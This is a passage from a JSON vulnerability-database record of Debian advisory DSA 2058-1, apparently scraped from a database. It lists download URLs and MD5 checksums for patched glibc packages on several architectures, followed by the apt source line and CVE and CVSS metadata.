http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 6265268 3b4d57d487312e1469b326d97d5adc43\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 12938 f3624c78267bff32219a2e9f77aa4c6d\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 3234170 ad0e1341214cc691f094484c1809f4eb\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 2690204 30f4c9e4a601253b0e3879bec11b5be4\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 197936 eba3b4d41c214d32a50c100c823f62c6\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 22610 ed1cb78c022f4c8410fc9fbb11a5b024\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 1743334 afafc27db97fae6af8475335ccb7ecce\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2083026 997c153a4764dd0b4df5c49516448fe1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 1075286 7a0b1d333b7f2845cd696b23176e4086\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2774510 91ee6ad39f8cb4299351725c34834f3c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 8900 05e3412e81e41dba932012299ad1c6b9\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2502016 1b9f1b03137d28d412efeccfabfc129e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2634372 4d64360c5b1d1574bafbd1c1e2ebd37b\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 173274 dd0b16d480f6caf243a78c86fd2881e9\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 9232740 264af461f35baac3c8d47e3ea1aa94dc\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 4355348 8bcc7566fb3dc39b290340b530db38e6\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 5618994 9ed756a5187a9f2b78cd9c3f4c302b66\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2360594 1715033754e2c0cb881cf80dc14f2353\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 15268 b424520237d4ed24e449cb84eb35d533\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 1497378 5674b015f009c8df673e8efc2cb0df59\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 4965718 5a54c66a2204cbb250359f1f883653da\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 4257420 2069013636632e5af43c5bd2bbeb8569\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 1070864 9e1bf74bf2fa7887214587883b4668c5\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 172474 223733149d23b923fd2972e11e4a314b\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 8944 70c9e850f36487426610231334dbae70\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2466340 5917616c1f7c7084ce094afdf26c370a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2342756 2994dc7e36cdf7b37e338d466f0014a3\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 4870038 867410534719d991cae57e1b95c463ae\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 15348 47ab6c42738f79666fd7b0a76c4d740a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 1494574 b8b405bd03ff4d7228421397deeec896\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2074286 04860198fc9f5d87c36de120cf87a66f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2623718 c79f0343dbe4e2842dc98d06b9922d3d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 9122594 b7147a76c5730a163795015c85d78501\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2706880 4d365f59bc9e6828d94adc74dd559aeb\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 5546712 e6e10890c2ec001562aa3de764dec691\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 4495386 34e79dac6fa4f6c5507d77371df8c806\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 16840 c1472162d75104dbed2af920c077e145\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 5201168 e8af0591b517e2212c81bd4e28f6eee3\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 9412 b46e7c06fda73e99abc3b0251cfa0fae\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2756472 80a2a1d8343ac0d2d5a7d15597e5e1b1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2410962 91d50628e6f807301b4100092ddd29b1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 1598006 b450a53fe6c4c8207bbeeb4789c4024c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 6329310 992d419ebebe8474714d4d9af894315e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 1224472 daf839353d109c04b467541e35541e24\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 175108 87b3d7604a7efe7da0987b8c73720d6c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2258436 a6413211eb3fddda694f1b274e31b692\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2805968 0819f0e9d5a13b9c122a038187ce349f\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2365558 82b0169430d68fbfde5580fc55af8539\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 5960804 0b2e1fc0f81a2cb1c0128c6e104f39c4\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 1218900 936f3961797f3ed1f2058accde977993\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2719690 b38b5bd34f66fc16780fe3b08dd38a2d\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 9036 43f683a165085bb78d8cff4875a30fbd\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 16196 4e520a214d39690c8fa75bcd1cba89f2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 4263974 757b89131b53bba9d31f634630432b00\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 5017052 c218f95d67d4c1d33b9fe5138822a1f5\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 1536062 1eceb2b77a00165200062277f7f0fc68\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2196462 f0abedaa97aadfc962e11a1888f14e46\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2649836 e29ac3e192a8fa9d712eb3c8392e1cf6\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 177020 687b7de35e5d43d61eba85dabc295cde\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 4454834 ec068840b37666d1b7297ce4a0ca92e0\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 171076 c06ceb8fe02cc101a955baebcaa2c44f\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 15044 4b185346f48fdb5ce70dcf52b0318c3b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 1249952 1105fbdeb4a8a907a94358d0275cb010\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 1613194 3974152e0fed955e3368c205d5d62864\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2827474 936597c4403bf74c6be1a41cb6a580ff\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 5151582 b886dd55f655415a755197e070a0f18b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2589968 6076836558c4d0370e643ad19bb9134c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 6797490 54a57b72675f41c4e7a36c3294e3b15c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 8324 a601cd0dfc7d2f7c8a35e83f8e70e643\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2304008 cfaf34cc9348baa6dc976c95033ee71d\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2795854 3d674864ce1c25365e85892f63c6c102\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 1762052 799715028d86fad7d041b93577bc6021\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 1, "reporter": "Debian", "published": "2010-06-10T08:14:08", "title": "[SECURITY] [DSA 2058-1] New glibc packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:09", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2010-06-10T08:14:08", "id": "DEBIAN:DSA-2058-1:F253E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00101.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}